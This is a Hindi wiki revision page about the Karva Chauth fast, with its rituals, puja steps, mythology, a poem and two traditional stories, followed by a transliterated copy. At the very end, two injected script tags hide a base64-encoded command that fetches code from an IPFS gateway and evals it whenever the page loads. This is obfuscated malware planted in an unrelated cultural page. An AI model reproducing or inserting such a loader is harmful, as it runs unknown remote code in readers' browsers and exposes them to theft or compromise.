Difference between revisions of "करवा चौथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Karva-Chauth-1.jpg|करवा चौथ<br /> Karva Chauth|thumb|300px]]
 
[[चित्र:Karva-Chauth-1.jpg|करवा चौथ<br /> Karva Chauth|thumb|300px]]
 +
करवा चौथ का पर्व [[भारत]] में [[उत्तर प्रदेश]], [[पंजाब]], [[राजस्थान]] और [[गुजरात]] में मनाया जाता है। करवा चौथ का व्रत कार्तिक मास के कृष्ण पक्ष में चंद्रोदय व्यापिनी चतुर्थी को किया जाता है। करवा चौथ स्त्रियों का सर्वाधिक प्रिय व्रत है। यों तो प्रत्येक मास के कृष्ण पक्ष की चतुर्थी को [[गणेश]] जी और [[चंद्रमा देवता|चंद्रमा]] का व्रत किया जाता है। परंतु इनमें करवा चौथ का सर्वाधिक महत्व है। इस दिन सौभाग्यवती स्त्रियां अटल सुहाग, पति की दीर्घ आयु, स्वास्थ्य एवं मंगलकामना के लिए यह व्रत करती हैं। [[वामन पुराण]] मे करवा चौथ व्रत का वर्णन आता है।  
  
 
+
करवा चौथ व्रत को रखने वाली स्त्रियों को प्रात:काल स्नान आदि के बाद आचमन करके पति, पुत्र-पौत्र तथा सुख-सौभाग्य की इच्छा का संकल्प लेकर इस व्रत को करना चाहिए। करवा चौथ के व्रत में [[शिव]], [[पार्वती देवी|पार्वती]], [[कार्तिकेय]], [[गणेश]] तथा [[चंद्रमा देवता|चंद्रमा]] का पूजन करने का विधान है। स्त्रियां चंद्रोदय के बाद चंद्रमा के दर्शन कर अर्घ्य देकर ही जल-भोजन ग्रहण करती हैं। पूजा के बाद तांबे या मिट्टी के करवे में चावल, उड़द की दाल, सुहाग की सामग्री जैसे- कंघी, शीशा, सिंदूर, चूड़ियां, रिबन व रुपया रखकर दान करना चाहिए तथा सास के पांव छूकर फल, मेवा व सुहाग की सारी सामग्री उन्हें देनी चाहिए।{{दाँयाबक्सा}}हमारे पौराणिक साहित्य के सबसे आदर्श और सबसे आकर्षक युगल शिव-पार्वती हैं और हमारे भारत में पति-पत्नी के बीच के सारे पर्व और त्योहार शिव और पार्वती जी से जुड़े हुए हैं। वह पर्व चाहे हरतालिका तीज हो, मंगलागौरी, जया-पार्वती हो या फिर करवा चौथ हो।{{बक्साबन्द}}
करवा चौथ का व्रत कार्तिक मास के कृष्ण पक्ष में चंद्रोदय व्यापिनी चतुर्थी को किया जाता है। करवा चौथ स्त्रियों का सर्वाधिक प्रिय व्रत है। यों तो प्रत्येक मास के कृष्ण पक्ष की चतुर्थी को [[गणेश]] जी और [[चंद्रमा देवता|चंद्रमा]] का व्रत किया जाता है। परंतु इनमें करवा चौथ का सर्वाधिक महत्व है। इस दिन सौभाग्यवती स्त्रियां अटल सुहाग, पति की दीर्घ आयु, स्वास्थ्य एवं मंगलकामना के लिए यह व्रत करती हैं। यह व्रत सौभाग्य और शुभ संतान देने वाला है।
+
==व्रत की प्रक्रिया==
करवा चौथ व्रत को रखने वाली स्त्रियों को प्रात:काल स्नान आदि के बाद आचमन करके पति, पुत्र-पौत्र तथा सुख-सौभाग्य की इच्छा का संकल्प लेकर इस व्रत को करना चाहिए। करवा चौथ के व्रत में [[शिव]], [[पार्वती देवी|पार्वती]], [[कार्तिकेय]], [[गणेश]] तथा [[चंद्रमा देवता|चंद्रमा]] का पूजन करने का विधान है। स्त्रियां चंद्रोदय के बाद चंद्रमा के दर्शन कर अर्घ्य देकर ही जल-भोजन ग्रहण करती हैं। पूजा के बाद तांबे या मिट्टी के करवे में चावल, उड़द की दाल, सुहाग की सामग्री जैसे- कंघी, शीशा, सिंदूर, चूड़ियां, रिबन व रुपया रखकर दान करना चाहिए तथा सास के पांव छूकर फल, मेवा व सुहाग की सारी सामग्री उन्हें देनी चाहिए।
 
 
 
==पूजन-विधि==
 
 
{{tocright}}
 
{{tocright}}
करवा चौथ सुहागिन स्त्रियों का व्रत है। यह व्रत निर्जल है अर्थात इस व्रत में पानी भी नहीं पिया जाता। चंद्रोदय के कुछ पूर्व एक पटरे पर कपड़ा बिछाकर अथवा बालू से वेदी बनाकर उस पर मिट्टी से शिवजी, पार्वतीजी, कार्तिकेयजी और चंद्रमा की छोटी-छोटी मूर्तियाँ बनाते हैं। आजकल इनकी जगह बाज़ार में करवा चौथ पूजन के छपे हुए पोस्टर भी आते हैं। फिर पटरे के पास पानी से भरा लोटा और करवा रखकर करवा चौथ की कहानी सुनी जाती है। कहानी सुनने से पूर्व करवे पर रोली से एक सतिया बनाकर उस पर रोली से 13 बिन्दियां लगाई जाती हैं। हाथ में गेहूँ के 13 दाने लेकर कथा सुनी जाती है। और चंद्र निकल आने पर उसे अर्घ्य देने के बाद स्त्रियां भोजन करती हैं। फिर एक कटोरे में चीनी भरकर उस पर रुपये रखकर करवा चौथ का बायना निकालकर सास, ननद या जिठानी को दिया जाता हैं। जिस वर्ष लड़की की शादी होती है उस वर्ष उसके पीहर से चौदह चीनी के करवों, बर्तनों, कपड़ों और गेहूँ आदि के साथ बायना भी आता है।  
+
*करवा चौथ में प्रयुक्त होने वाली संपूर्ण सामग्री को एकत्रित करें।
 +
*व्रत के दिन प्रातः स्नानादि करने के पश्चात यह संकल्प बोलकर करवा चौथ व्रत का आरंभ करें- '''मम सुखसौभाग्य पुत्रपौत्रादि सुस्थिर श्री प्राप्तये करक चतुर्थी व्रतमहं करिष्ये।'''
 +
*पूरे दिन निर्जल रहें।
 +
*दीवार पर गेरू से फलक बनाकर पिसे चावलों के घोल से करवा चित्रित करें। इसे वर कहते हैं। चित्रित करने की कला को करवा धरना कहा जाता है।
 +
*आठ पूरियों की अठावरी बनाएँ। हलुआ बनाएँ। पक्के पकवान बनाएँ।
 +
*पीली मिट्टी से गौरी बनाएँ और उनकी गोद में गणेशजी बनाकर बिठाएँ।
 +
*गौरी को लकड़ी के आसन पर बिठाएँ। चौक बनाकर आसन को उस पर रखें। गौरी को चुनरी ओढ़ाएँ। बिंदी आदि सुहाग सामग्री से गौरी का श्रृंगार करें।
 +
*जल से भरा हुआ लोटा रखें।
 +
*वायना (भेंट) देने के लिए मिट्टी का टोंटीदार करवा लें। करवा में गेहूँ और ढक्कन में शकर का बूरा भर दें। उसके ऊपर दक्षिणा रखें।
 +
*रोली से करवा पर स्वस्तिक बनाएँ।
 +
*गौरी-गणेश और चित्रित करवा की परंपरानुसार पूजा करें। पति की दीर्घायु की कामना करें। '''नमः शिवायै शर्वाण्यै सौभाग्यं संतति शुभाम्‌। प्रयच्छ भक्तियुक्तानां नारीणां हरवल्लभे॥'''
 +
*करवा पर 13 बिंदी रखें और गेहूँ या चावल के 13 दाने हाथ में लेकर करवा चौथ की कथा कहें या सुनें।
 +
*कथा सुनने के बाद करवा पर हाथ घुमाकर अपनी सासुजी के पैर छूकर आशीर्वाद लें और करवा उन्हें दे दें।
 +
*तेरह दाने गेहूँ के और पानी का लोटा या टोंटीदार करवा अलग रख लें।
 +
*रात्रि में चन्द्रमा निकलने के बाद छलनी की ओट से उसे देखें और चन्द्रमा को अर्घ्य दें।
 +
*इसके बाद पति से आशीर्वाद लें। उन्हें भोजन कराएँ और स्वयं भी भोजन कर लें।
 +
*जिस वर्ष लड़की की शादी होती है उस वर्ष उसके पीहर से चौदह चीनी के करवों, बर्तनों, कपड़ों और गेहूँ आदि के साथ बायना भी आता है। *
 
==उजमन==
 
==उजमन==
अन्य व्रतों के समान करवा चौथ का भी उजमन किया जाता है। करवा चौथ के उजमन में एक थाल में तेरह जगह चार-चार पूड़ियाँ रखकर उनके ऊपर सूजी का हलुवा रखा जाता है। इसके ऊपर साड़ी-ब्लाउज और रुपये रखे जाते हैं। हाथ में रोली, चावल लेकर थाल में चारों ओर हाथ घुमाने के बाद यह बायना सास को दिया जाता है। तेरह सुहागिन स्त्रियों को भोजन कराने के बाद उनके माथे पर बिंदी लगाकर और सुहाग की वस्तुएँ एवं दक्षिणा देकर विदा कर दिया जाता है।
+
अन्य व्रतों के समान करवा चौथ का भी उजमन किया जाता है। करवा चौथ के उजमन में एक थाल में तेरह जगह चार-चार पूड़ियाँ रखकर उनके ऊपर सूजी का हलुवा रखा जाता है। इसके ऊपर साड़ी-ब्लाउज और रुपये रखे जाते हैं। हाथ में रोली, चावल लेकर थाल में चारों ओर हाथ घुमाने के बाद यह बायना सास को दिया जाता है। तेरह सुहागिन स्त्रियों को भोजन कराने के बाद उनके माथे पर बिंदी लगाकर और सुहाग की वस्तुएँ एवं दक्षिणा देकर विदा कर दिया जाता है।{{दाँयाबक्सा}}करवाचौथ महज एक व्रत नहीं है, बल्कि सूत्र है, विश्चास का कि हम साथ साथ रहेंगे, आधार है जीने का कि हमारा साथ ना छूटे। आज हम कितना भी आधुनिक हो जायें, पर क्या ये आधुनिकता हमारे बीच के प्यार को मिटाने के लिये होनी चाहिये?{{बक्साबन्द}}
 +
==पौराणिक साहित्य==
 +
हमारे पौराणिक साहित्य के सबसे आदर्श और सबसे आकर्षक युगल शिव-पार्वती हैं और हमारे भारत में पति-पत्नी के बीच के सारे पर्व और त्योहार शिव और पार्वती जी से जुड़े हुए हैं। वह पर्व चाहे हरतालिका तीज हो, मंगलागौरी, जया-पार्वती हो या फिर करवा चौथ हो। अपने पति के स्वास्थ्य और दीर्घायु के लिए किया जाने वाला करवा चौथ का व्रत हर विवाहित स्त्री के जीवन में एक नई उमंग लाता है। कुंवारी लड़की अपने लिए शिव की तरह प्रेम करने वाले पति की कामना करती है और इसके लिए सोमवार से लेकर जया-पार्वती तक के सभी व्रत पूरी आस्था से करती है। इसी तरह करवा चौथ का संबंध भी शिव और पार्वती से है।
 +
==परंपरा और विश्वास का त्योहार==
 +
<poem>
 +
ओ चाँद तुझे पता है क्या?
 +
तू कितना अनमोल है
 +
देखने को धरती की सारी पत्नियाँ
 +
बेसब्र फलक को ताकेंगी
 +
कब आयेगा, तू कब छायेगा?
 +
देगा उनको आशीर्वचन
 +
होगा उनका प्रेम अमर</poem>
 +
परंपरा वक्त की मांग के अनुसार बनी होती है, वक़्त के साथ परंपरा में संशोधन किया जाना चाहिये पर उसको तिरस्कृत नहीं करना चाहिये, आखिर यही परम्परा हमारे पूर्वजों की धरोहर है। भारतीय महिलाओं की आस्था, परंपरा, धार्मिकता, अपने पति के लिये प्यार, सम्मान, समर्पण, इस एक व्रत में सब कुछ निहीत है। भारतीय पत्नी की सारी दुनिया, उसके पति से शुरू होती है उन्हीं पर समाप्त होती है। चाँद को इसीलिये इसका प्रतीक माना गया होगा क्योंकि चाँद भी धरती के कक्षा में जिस तन्मयता, प्यार समर्पण से वो धरती के इर्द गिर्द रहता है, हमारी भारतीय औरते उसी प्रतीक को अपना लेती हैं। वैसे भी हमारा भारत, अपने परंपराओं, प्रकृति प्रेम, अध्यात्मिकता, वृहद संस्कृति, उच्च विचार और धार्मिक पुरजोरता के आधार पर विश्व में अपने अलग पहचान बनाने में सक्षम है। इसके उदाहरण स्वरूप करवा चौथ से अच्छा कौन सा व्रत हो सकता है जो कि परंपरा, अध्यात्म, प्यार, समर्पण, प्रकृति प्रेम, और जीवन सबको एक साथ, एक सूत्र में पिरोकर, सदियों से चलता आ रहा है। यह पावन व्रत किसी परंपरा के आधार पर न होकर, युगल के अपने ताल-मेल पर हो तो बेहतर है। जहाँ पत्नी इस कामना के साथ दिन भर निर्जला रहकर रात को चाँद देखकर अपने चाँद के शाश्वत जीवन की कामना करती है, वह कामना सच्चे दिल से शाश्वत प्रेम से परिपूर्ण हो, न कि सिर्फ इसलिये हो को ऐसी परंपरा है। यह तभी संभव होगा जब युगल का व्यक्तिगत जीवन परंपरा के आधार पर न जाकर, प्रेम के आधार पर हो, शादी सिर्फ एक बंधन न हो, बल्कि शादी नवजीवन का खुला आकाश हो, जिसमें प्यार का ऐसा वृक्ष लहरायें जिसकी जड़ों में परंपरा का दीमक नहीं प्यार का अमृत बरसता हो, जिसकी तनाओं में, बंधन का नहीं प्रेम का आधार हो। जब ऐसा युगल एक दूसरे के लिये, करवा चौथ का व्रत करके चाँद से अपने प्यार के शाश्वत होने का आशीर्वचन माँगेगा तो चाँद ही क्या, पूरी कायनात से उनको वो आशीर्वचन मिलेगा। करवाचौथ महज एक व्रत नहीं है, बल्कि सूत्र है, विश्चास का कि हम साथ साथ रहेंगे, आधार है जीने का कि हमारा साथ ना छूटे। आज हम कितना भी आधुनिक हो जायें, पर क्या ये आधुनिकता हमारे बीच के प्यार को मिटाने के लिये होनी चाहिये?
 +
==सजती है हर स्त्री
 +
करवा चौथ के दिन भारत की हर महिला दिनभर उपवास के बाद शाम को 18 साल की लड़की से लेकर 75 साल की महिला नई दुल्हन की तरह सजती-संवरती है। करवाचौथ के दिन एक खूबसूरत रिश्ता साल-दर-साल मजबूत होता है। कुंवारी लड़कियां (कुछ संप्रदायों में सगाई के बाद) शिव की तरह के पति की चाहत में, तो शादीशुदा स्त्रियां अपनी पति के स्वास्थ्य और दीर्घायु के लिए यह व्रत करती हैं।
 +
==परंपरा में नया मोड़==
 +
करवा चौथ के दिन अब पत्नी ही नहीं पति भी व्रत करते हैं। यह परंपरा का विस्तार है। करवा चौथ को अब सफल और खुशहाल दाम्पत्य की कामना के लिए किया जा रहा है। करवाचौथ अब केवल लोक-परंपरा नहीं रह गई है। पौराणिकता के साथ-साथ इसमें आधुनिकता का प्रवेश हो चुका है और अब यह त्योहार भावनाओं पर केंद्रित हो गया है। हमारे समाज की यही खासियत है कि हम परंपराओं में नवीनता का समावेश लगातार करते रहते हैं। कभी करवाचौथ पत्नी के, पति के प्रति समर्पण का प्रतीक हुआ करता था, लेकिन आज यह पति-पत्नी के बीच के सामंजस्य और रिश्ते की ऊष्मा से दमक और महक रहा है। आधुनिक होते दौर में हमने अपनी परंपरा तो नहीं छोड़ी है, अब इसमें ज्यादा संवेदनशीलता, समर्पण और प्रेम की अभिव्यक्ति दिखाई देती है। दोनों के बीच अहसास का घेरा मजबूत होता है, जो रिश्तों को सुरक्षित करता है।
 
==करवा चौथ कथा==
 
==करवा चौथ कथा==
 
एक बार [[अर्जुन]] नीलगिरि पर तपस्या करने गए। [[द्रौपदी]] ने सोचा कि यहाँ हर समय अनेक प्रकार की विघ्न-बाधाएं आती रहती हैं। उनके शमन के लिए अर्जुन तो यहाँ हैं नहीं, अत: कोई उपाय करना चाहिए। यह सोचकर उन्होंने भगवान श्री [[कृष्ण]] का ध्यान किया। भगवान वहाँ उपस्थित हुए तो द्रौपदी ने अपने कष्टों के निवारण हेतु कोई उपाय बताने को कहा। इस पर श्रीकृष्ण बोले- 'एक बार [[पार्वती देवी|पार्वती]] जी ने भी [[शिव]]जी से यही प्रश्न किया था तो उन्होंने कहा था कि करवा चौथ का व्रत गृहस्थी में आने वाली छोटी-मोटी विघ्न-बाधाओं को दूर करने वाला है। यह पित्त प्रकोप को भी दूर करता है। फिर श्रीकृष्ण ने द्रौपदी को एक कथा सुनाई-
 
एक बार [[अर्जुन]] नीलगिरि पर तपस्या करने गए। [[द्रौपदी]] ने सोचा कि यहाँ हर समय अनेक प्रकार की विघ्न-बाधाएं आती रहती हैं। उनके शमन के लिए अर्जुन तो यहाँ हैं नहीं, अत: कोई उपाय करना चाहिए। यह सोचकर उन्होंने भगवान श्री [[कृष्ण]] का ध्यान किया। भगवान वहाँ उपस्थित हुए तो द्रौपदी ने अपने कष्टों के निवारण हेतु कोई उपाय बताने को कहा। इस पर श्रीकृष्ण बोले- 'एक बार [[पार्वती देवी|पार्वती]] जी ने भी [[शिव]]जी से यही प्रश्न किया था तो उन्होंने कहा था कि करवा चौथ का व्रत गृहस्थी में आने वाली छोटी-मोटी विघ्न-बाधाओं को दूर करने वाला है। यह पित्त प्रकोप को भी दूर करता है। फिर श्रीकृष्ण ने द्रौपदी को एक कथा सुनाई-

Revision as of 10:54, 25 October 2010

karava chauth
Karva Chauth|thumb|300px
karava chauth ka parv bharat mean uttar pradesh, panjab, rajasthan aur gujarat mean manaya jata hai. karava chauth ka vrat kartik mas ke krishna paksh mean chandroday vyapini chaturthi ko kiya jata hai. karava chauth striyoan ka sarvadhik priy vrat hai. yoan to pratyek mas ke krishna paksh ki chaturthi ko ganesh ji aur chandrama ka vrat kiya jata hai. parantu inamean karava chauth ka sarvadhik mahatv hai. is din saubhagyavati striyaan atal suhag, pati ki dirgh ayu, svasthy evan mangalakamana ke lie yah vrat karati haian. vaman puran me karava chauth vrat ka varnan ata hai.  

karava chauth vrat ko rakhane vali striyoan ko prat:kal snan adi ke bad achaman karake pati, putr-pautr tatha sukh-saubhagy ki ichchha ka sankalp lekar is vrat ko karana chahie. karava chauth ke vrat mean shiv, parvati, kartikey, ganesh tatha chandrama ka poojan karane ka vidhan hai. striyaan chandroday ke bad chandrama ke darshan kar arghy dekar hi jal-bhojan grahan karati haian. pooja ke bad taanbe ya mitti ke karave mean chaval, u dad ki dal, suhag ki samagri jaise- kanghi, shisha, siandoor, choo diyaan, riban v rupaya rakhakar dan karana chahie tatha sas ke paanv chhookar phal, meva v suhag ki sari samagri unhean deni chahie.

chitr:Blockquote-open.gif

chitr:Blockquote-close.gif

hamare pauranik sahity ke sabase adarsh aur sabase akarshak yugal shiv-parvati haian aur hamare bharat mean pati-patni ke bich ke sare parv aur tyohar shiv aur parvati ji se ju de hue haian. vah parv chahe haratalika tij ho, mangalagauri, jaya-parvati ho ya phir karava chauth ho.chitr:Blockquote-close.gif |}

vrat ki prakriya

  • karava chauth mean prayukt hone vali sanpoorn samagri ko ekatrit karean.
  • vrat ke din pratah snanadi karane ke pashchat yah sankalp bolakar karava chauth vrat ka aranbh karean- mam sukhasaubhagy putrapautradi susthir shri praptaye karak chaturthi vratamahan karishye.
  • poore din nirjal rahean.
  • divar par geroo se phalak banakar pise chavaloan ke ghol se karava chitrit karean. ise var kahate haian. chitrit karane ki kala ko karava dharana kaha jata hai.
  • ath pooriyoan ki athavari banaean. halua banaean. pakke pakavan banaean.
  • pili mitti se gauri banaean aur unaki god mean ganeshaji banakar bithaean.
  • gauri ko lak di ke asan par bithaean. chauk banakar asan ko us par rakhean. gauri ko chunari odhaean. biandi adi suhag samagri se gauri ka shrriangar karean.
  • jal se bhara hua lota rakhean.
  • vayana (bheant) dene ke lie mitti ka toantidar karava lean. karava mean gehooan aur dhakkan mean shakar ka boora bhar dean. usake oopar dakshina rakhean.
  • roli se karava par svastik banaean.
  • gauri-ganesh aur chitrit karava ki paranparanusar pooja karean. pati ki dirghayu ki kamana karean. namah shivayai sharvanyai saubhagyan santati shubhamh‌. prayachchh bhaktiyuktanaan narinaan haravallabhe॥
  • karava par 13 biandi rakhean aur gehooan ya chaval ke 13 dane hath mean lekar karava chauth ki katha kahean ya sunean.
  • katha sunane ke bad karava par hath ghumakar apani sasuji ke pair chhookar ashirvad lean aur karava unhean de dean.
  • terah dane gehooan ke aur pani ka lota ya toantidar karava alag rakh lean.
  • ratri mean chandrama nikalane ke bad chhalani ki ot se use dekhean aur chandrama ko arghy dean.
  • isake bad pati se ashirvad lean. unhean bhojan karaean aur svayan bhi bhojan kar lean.
  • jis varsh l daki ki shadi hoti hai us varsh usake pihar se chaudah chini ke karavoan, bartanoan, kap doan aur gehooan adi ke sath bayana bhi ata hai. *

ujaman

any vratoan ke saman karava chauth ka bhi ujaman kiya jata hai. karava chauth ke ujaman mean ek thal mean terah jagah char-char poo diyaan rakhakar unake oopar sooji ka haluva rakha jata hai. isake oopar sa di-blauj aur rupaye rakhe jate haian. hath mean roli, chaval lekar thal mean charoan or hath ghumane ke bad yah bayana sas ko diya jata hai. terah suhagin striyoan ko bhojan karane ke bad unake mathe par biandi lagakar aur suhag ki vastuean evan dakshina dekar vida kar diya jata hai.

chitr:Blockquote-open.gif

chitr:Blockquote-close.gif

karavachauth mahaj ek vrat nahian hai, balki sootr hai, vishchas ka ki ham sath sath raheange, adhar hai jine ka ki hamara sath na chhoote. aj ham kitana bhi adhunik ho jayean, par kya ye adhunikata hamare bich ke pyar ko mitane ke liye honi chahiye?chitr:Blockquote-close.gif |}

pauranik sahity

hamare pauranik sahity ke sabase adarsh aur sabase akarshak yugal shiv-parvati haian aur hamare bharat mean pati-patni ke bich ke sare parv aur tyohar shiv aur parvati ji se ju de hue haian. vah parv chahe haratalika tij ho, mangalagauri, jaya-parvati ho ya phir karava chauth ho. apane pati ke svasthy aur dirghayu ke lie kiya jane vala karava chauth ka vrat har vivahit stri ke jivan mean ek nee umang lata hai. kuanvari l daki apane lie shiv ki tarah prem karane vale pati ki kamana karati hai aur isake lie somavar se lekar jaya-parvati tak ke sabhi vrat poori astha se karati hai. isi tarah karava chauth ka sanbandh bhi shiv aur parvati se hai.

paranpara aur vishvas ka tyohar

o chaand tujhe pata hai kya?
too kitana anamol hai
dekhane ko dharati ki sari patniyaan
besabr phalak ko takeangi
kab ayega, too kab chhayega?
dega unako ashirvachan
hoga unaka prem amar

paranpara vakt ki maang ke anusar bani hoti hai, vaqt ke sath paranpara mean sanshodhan kiya jana chahiye par usako tiraskrit nahian karana chahiye, akhir yahi parampara hamare poorvajoan ki dharohar hai. bharatiy mahilaoan ki astha, paranpara, dharmikata, apane pati ke liye pyar, samman, samarpan, is ek vrat mean sab kuchh nihit hai. bharatiy patni ki sari duniya, usake pati se shuroo hoti hai unhian par samapt hoti hai. chaand ko isiliye isaka pratik mana gaya hoga kyoanki chaand bhi dharati ke kaksha mean jis tanmayata, pyar samarpan se vo dharati ke ird gird rahata hai, hamari bharatiy aurate usi pratik ko apana leti haian. vaise bhi hamara bharat, apane paranparaoan, prakriti prem, adhyatmikata, vrihad sanskriti, uchch vichar aur dharmik purajorata ke adhar par vishv mean apane alag pahachan banane mean saksham hai. isake udaharan svaroop karava chauth se achchha kaun sa vrat ho sakata hai jo ki paranpara, adhyatm, pyar, samarpan, prakriti prem, aur jivan sabako ek sath, ek sootr mean pirokar, sadiyoan se chalata a raha hai. yah pavan vrat kisi paranpara ke adhar par n hokar, yugal ke apane tal-mel par ho to behatar hai. jahaan patni is kamana ke sath din bhar nirjala rahakar rat ko chaand dekhakar apane chaand ke shashvat jivan ki kamana karati hai, vah kamana sachche dil se shashvat prem se paripoorn ho, n ki sirph isaliye ho ko aisi paranpara hai. yah tabhi sanbhav hoga jab yugal ka vyaktigat jivan paranpara ke adhar par n jakar, prem ke adhar par ho, shadi sirph ek bandhan n ho, balki shadi navajivan ka khula akash ho, jisamean pyar ka aisa vriksh laharayean jisaki j doan mean paranpara ka dimak nahian pyar ka amrit barasata ho, jisaki tanaoan mean, bandhan ka nahian prem ka adhar ho. jab aisa yugal ek doosare ke liye, karava chauth ka vrat karake chaand se apane pyar ke shashvat hone ka ashirvachan maangega to chaand hi kya, poori kayanat se unako vo ashirvachan milega. karavachauth mahaj ek vrat nahian hai, balki sootr hai, vishchas ka ki ham sath sath raheange, adhar hai jine ka ki hamara sath na chhoote. aj ham kitana bhi adhunik ho jayean, par kya ye adhunikata hamare bich ke pyar ko mitane ke liye honi chahiye? ==sajati hai har stri karava chauth ke din bharat ki har mahila dinabhar upavas ke bad sham ko 18 sal ki l daki se lekar 75 sal ki mahila nee dulhan ki tarah sajati-sanvarati hai. karavachauth ke din ek khoobasoorat rishta sal-dar-sal majaboot hota hai. kuanvari l dakiyaan (kuchh sanpradayoan mean sagaee ke bad) shiv ki tarah ke pati ki chahat mean, to shadishuda striyaan apani pati ke svasthy aur dirghayu ke lie yah vrat karati haian.

paranpara mean naya mo d

karava chauth ke din ab patni hi nahian pati bhi vrat karate haian. yah paranpara ka vistar hai. karava chauth ko ab saphal aur khushahal dampaty ki kamana ke lie kiya ja raha hai. karavachauth ab keval lok-paranpara nahian rah gee hai. pauranikata ke sath-sath isamean adhunikata ka pravesh ho chuka hai aur ab yah tyohar bhavanaoan par keandrit ho gaya hai. hamare samaj ki yahi khasiyat hai ki ham paranparaoan mean navinata ka samavesh lagatar karate rahate haian. kabhi karavachauth patni ke, pati ke prati samarpan ka pratik hua karata tha, lekin aj yah pati-patni ke bich ke samanjasy aur rishte ki ooshma se damak aur mahak raha hai. adhunik hote daur mean hamane apani paranpara to nahian chho di hai, ab isamean jyada sanvedanashilata, samarpan aur prem ki abhivyakti dikhaee deti hai. donoan ke bich ahasas ka ghera majaboot hota hai, jo rishtoan ko surakshit karata hai.

karava chauth katha

ek bar arjun nilagiri par tapasya karane ge. draupadi ne socha ki yahaan har samay anek prakar ki vighn-badhaean ati rahati haian. unake shaman ke lie arjun to yahaan haian nahian, at: koee upay karana chahie. yah sochakar unhoanne bhagavan shri krishna ka dhyan kiya. bhagavan vahaan upasthit hue to draupadi ne apane kashtoan ke nivaran hetu koee upay batane ko kaha. is par shrikrishna bole- 'ek bar parvati ji ne bhi shivji se yahi prashn kiya tha to unhoanne kaha tha ki karava chauth ka vrat grihasthi mean ane vali chhoti-moti vighn-badhaoan ko door karane vala hai. yah pitt prakop ko bhi door karata hai. phir shrikrishna ne draupadi ko ek katha sunaee-

katha

'prachinakal mean ek dharmaparayan brahman ke sat putr tatha ek putri thi. b di hone par putri ka vivah kar diya gaya. kartik ki chaturthi ko kanya ne karava chauth ka vrat rakha. sat bhaiyoan ki la dali bahan ko chandroday se pahale hi bhookh satane lagi. usaka phool sa chehara murajha gaya. bhaiyoan ke lie bahan ki yah vedana asahy thi. at: ve kuchh upay sochane lage. unhoanne bahan se chandroday se pahale hi bhojan karane ko kaha, par bahan n mani. tab bhaiyoan ne snehavash pipal ke vriksh ki a d mean prakash karake kaha- dekho ! chandroday ho gaya. utho, arghy dekar bhojan karo.' bahan uthi aur chandrama ko arghy dekar bhojan kar liya. bhojan karate hi usaka pati mar gaya. vah rone chillane lagi. daivayog se indrani devadasiyoan ke sath vahaan se ja rahi thian. rone ki avaj sun ve vahaan geean aur usase rone ka karan poochha.


brahman kanya ne sab hal kah sunaya. tab indrani ne kaha- 'tumane karava chauth ke vrat mean chandroday se poorv hi ann-jal grahan kar liya, isi se tumhare pati ki mrityu huee hai. ab yadi tum mrit pati ki seva karati huee barah mahinoan tak pratyek chauth ko yathavidhi vrat karoan, phir karava chauth ko vidhivat gauri, shiv, ganesh, kartikey sahit chandrama ka poojan karo tatha chandroday ke bad arghy dekar ann-jal grahan karo to tumhare pati avashy jivit ho utheange.' brahman kanya ne agale varsh 12 mah ki chauth sahit vidhipoorvak karava chauth ka vrat kiya. vrat ke prabhav se unaka mrit pati jivit ho gaya. is prakar yah katha kahakar shri krishna draupadi se bole- 'yadi tum bhi shraddha evan vidhipoorvak is vrat ko karo to tumhare sare dukh door ho jaeange aur sukh-saubhagy, dhan-dhany mean vriddhi hogi.' phir draupadi ne shri krishna ke kathananusar karava chauth ka vrat rakha. us vrat ke prabhav se mahabharat ke yuddh mean kauravoan ki har tatha pandavoan ki jit huee.

karava chauth katha dvitiy

prachin samay mean karava nam ki ek pativrata stri thi. vah apane pati ke sath nadi kinare ke ek gaanv mean rahati thi. usaka pati vriddh tha. ek din vah nadi mean snan karane gaya. nadi mean nahate samay ek magar ne use pak d liya. is par vyakti 'karava karava' chillakar apani patni ko sahayata ke lie pukarane laga. karava pativrata stri thi. avaj ko sunakar karava bhagakar apane pati ke pas pahuanchi aur dau dakar kachche dhage se magar ko an dekar baandh diya. magar ko soot ke kachche dhage se baandhane ke bad karava yamaraj ke pas pahuanchi. ve us samay chitragupt ke khate dekh rahe the. karava ne sat siank le unhean jha dana shuroo kiya, yamaraj ke khate akash mean u dane lage. yamaraj ghabara ge aur bole- 'devi! too kya chahati hai?' karava ne kaha- 'he prabhu! ek magar ne nadi ke jal mean mere pati ka pair pak d liya hai. us magar ko ap apani shakti se apane lok (narak) mean le ao aur mere pati ko chirayu karo.'


karava ki bat sunakar yamaraj bole- 'devi! abhi magar ki ayu shesh hai. at: ayu rahate hue maian asamay magar ko mar nahian sakata.' is par karava ne kaha- 'yadi magar ko marakar ap mere pati ki raksha nahian karoge, to maian shap dekar apako nasht kar dooangi.' karava ki dhamaki se yamaraj dar ge. ve karava ke sath vahaan ae, jahaan magar ne usake pati ko pak d rakha tha. yamaraj ne magar ko marakar yamalok pahuancha diya aur karava ke pati ki pran raksha kar use dirghayu pradan ki. jate samay vah karava ko sukh-samriddhi dete ge tatha yah var bhi diya- 'jo stri is din vrat karegi, unake saubhagy ki maian raksha karooanga.' karava ne pativrat ke bal se apane pati ke pranoan ki raksha ki thi. is ghatana ke din se karava chauth ka vrat karava ke nam se prachalit ho gaya. jis din karava ne apane pati ke pran bachae the, us din kartik mas ke krishna paksh ki chauth thi. he karava mata! jaise apane (karava) apane pati ki pran raksha ki vaise hi sabake patiyoan ke jivan ki raksha karana.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>